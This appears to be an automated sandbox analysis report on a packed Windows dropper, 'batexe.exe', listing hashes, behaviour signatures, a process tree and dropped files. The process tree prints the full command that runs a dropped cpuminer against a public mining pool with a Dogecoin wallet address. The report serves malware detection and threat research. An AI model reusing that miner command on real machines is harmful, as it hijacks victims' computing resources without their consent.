73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
295s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240221-ja
resource tags

arch:x64arch:x86image:win10-20240221-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
21/02/2024, 15:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3268	b2e.exe
4748	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4748	cpuminer-sse2.exe
4748	cpuminer-sse2.exe
4748	cpuminer-sse2.exe
4748	cpuminer-sse2.exe
4748	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1492-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 3268	1492	batexe.exe	75
PID 1492 wrote to memory of 3268	1492	batexe.exe	75
PID 1492 wrote to memory of 3268	1492	batexe.exe	75
PID 3268 wrote to memory of 4416	3268	b2e.exe	76
PID 3268 wrote to memory of 4416	3268	b2e.exe	76
PID 3268 wrote to memory of 4416	3268	b2e.exe	76
PID 4416 wrote to memory of 4748	4416	cmd.exe	79
PID 4416 wrote to memory of 4748	4416	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Users\Admin\AppData\Local\Temp\9AF.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9AF.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9AF.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EB1.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4416
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4748

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9AF.tmp\b2e.exe

Filesize
3.0MB

MD5
9a2f1eb35e192ce72db5e3b01e90cda1

SHA1
1d82796b978e9bcaf201a4cff14488927d4fbd82

SHA256
cce23e823bb9a23e983219bd422669fdb457a5dc80376be3d44da7a0ba56d59f

SHA512
a47ed024a76abf3796d1f2f8ca6251a6c7d260fb8e409afe0daf3cedc4b4630ccb5553fc4a744b96be253234ed04d757be230b264085ba65c9119a654079903e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9AF.tmp\b2e.exe

Filesize
4.2MB

MD5
44c6956838e03defae93ce863fe2c273

SHA1
fd833c5dbeba301bfb09de7e6b89c7354eff556a

SHA256
49841364fa640a041273dd9a281ffb476a49889bb1851e433307113b5a610eb8

SHA512
e08d85c10d042e9ce1336b730c6f48e0aef200a030c8b13b1c478c381e9281a76bd680b8f36244e4d041a324daaad6f481f508b63efd8f495134534b8f981908

Download Submit
C:\Users\Admin\AppData\Local\Temp\EB1.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
397KB

MD5
b609b9a773ac97a0ce9c81fbe725e3d3

SHA1
ea052425cd6dbc134f141b0e7870ca5c10917ba4

SHA256
eb2e11ca874b08ad11f87d4996f6fd3c445a1c2422fa94ee3aee60ec3b0ca402

SHA512
663ccc5f828d8e06c5cc441d40dc454013785dc560f1442ba2849423db53b21eb678b9bb324c0e7d0fb747212130026e50ebd7be6bd3816307f96cf0739df436

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
77KB

MD5
973c174e0c323783a635a94951e3115c

SHA1
0953b43ab761f53bd8a56723d84890ecc825b825

SHA256
22561b6dfbc35301d893e05af106ac4df8c3f9f9ec0c861c441586f4c55ae818

SHA512
f8a06e4c6ee5d8a7b19fdb3a606ed6349a1a06b02c886bee48d23d8f59a72a7d4c8fa373f541e081dd855d59fe7303c653ea619cb9f4d2a343fad81ed725bef2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
161KB

MD5
2508dc13ccbd38913e61ed6c880066ea

SHA1
d0418608e934b91507429c7dedd5c58cdd1e59fa

SHA256
f7306e8dca099d5d6fcc1339b7c45efdfb510b2669178041755d56159fb0ef06

SHA512
8c875e033d00657b2033a43421ef8c87475469d81328a1f13d6b027a5a796e576f7ae70ab979255ac18801552ba7bbe99d78fc1de14998403646a1caf415ead8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
283KB

MD5
48bd17a6b330c1acd53d9f03981cb595

SHA1
d8186c6e78086eeecaa4968acbb70e5a51d43115

SHA256
59f6884e412c1959471c57be366250db62cecedb76ffe5668322bc5c28ec4409

SHA512
d9f3bc22cc2916cc31afb36471a73c845bbb216f5206edddd8f4eb679711f60cf6d4f31945b4fbdacfe8407294c685508ad05c6f24dd3be73a95cbe40ee79763

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
217KB

MD5
0e55cdb17bf4726d67345e78a801b460

SHA1
dffdcd597f55a4b56035c61edf8850a36020f235

SHA256
ab05878e86fec6175e620e34831a8c61a61992ec8aa9e042e728922c6b1bb2c8

SHA512
97aa38eb8b5a031ddceacd5a1a5fd944f63c161094e31c7c65cc5b5c7e88d7f3b04074223b57aeaf899254e1ea500718c85c5512512defdc3ec94933aa6658e5

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
184KB

MD5
ae74fb8897f23172187021c786fa511b

SHA1
9b60ee09a6675c82247048c7dd1fcbf4985fc507

SHA256
63cfe3b41f81cfe9b46d5d0c23edee0ea01a4b35b0262da1a1e5625dc663172c

SHA512
9538ab70dbb09cf857a761ef99a72e88297e13faeb0e756d162ecbbe0ad28ede22d28ad98a8fb2b1d087b7360ac8cac1a5615e1f5e3b11a4b719b350b135bb0b

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
162KB

MD5
9c7be6969a2f5604458d92e41cce549f

SHA1
a1c8137efaa72cbf792ff04a480ebedf298d5234

SHA256
ba0fdaabcbe7e82c92dd7ba968869595788a9e2d325bf4db6f7075d275056813

SHA512
c3e203b875d1c0fc41253a2bc2fd81150de0048d2918eacaccc57fd0fdd6ca2fc54af596186f32fcdf753070fe8e21ce5306e03210475c32209416a7c7871400

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
69KB

MD5
b397d22edabde61e99307d5be4ae1e4f

SHA1
fca021f822e017ba69a9062d7ca5fd818c5592ec

SHA256
337d2ff0361c6caeb22cd2a361693eec43345d235a45acbdb5f1e8899370976d

SHA512
14ef7650586501f38fa60765e1a4f786e694ebad25637ab4521255b1fda1ce4d78cfd99d22b31984b8af3ef078b12d2ffb7748ef1d3f0dba8d1ee85aceab0bb3

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
74KB

MD5
7841823a86ac932ed7ed9a19fee0b3da

SHA1
f50364b130175d82e263f054ac436aef30a2b240

SHA256
01a535ed36299220570493e63cefb359fc0a0fd41a1f8ebebb7f994a77be9fc9

SHA512
6c81e0a85edd16fa0b655aa39e623b1a4da988fe276f01a8f9b3c7d3f3df7fe032548b4940b776ab9ecd8159e9bdc4c8bb7cd6524d925e426e5cbd65e8301092

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
128KB

MD5
8d949f4e279a9a80f50d7c2e0c7bff36

SHA1
92e29300716211895b2d8cd4cf010452f0132152

SHA256
2e87614d15e62262c8b0a0c65e302b15e971b591469f3c679e7e516934cf621f

SHA512
36565dc0a3290ac8c5e0fd0a2756764ce8e49a7ef52a437caad549c7ea1ac3ac7dfe05cd4951ed6b17051768fd9733c94365d85832092c429b0b74ab62a338fb

Download Submit
memory/1492-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3268-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3268-5-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4748-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-43-0x0000000052D70000-0x0000000052E08000-memory.dmp

Filesize
608KB

Download
memory/4748-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4748-44-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/4748-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4748-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4748-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download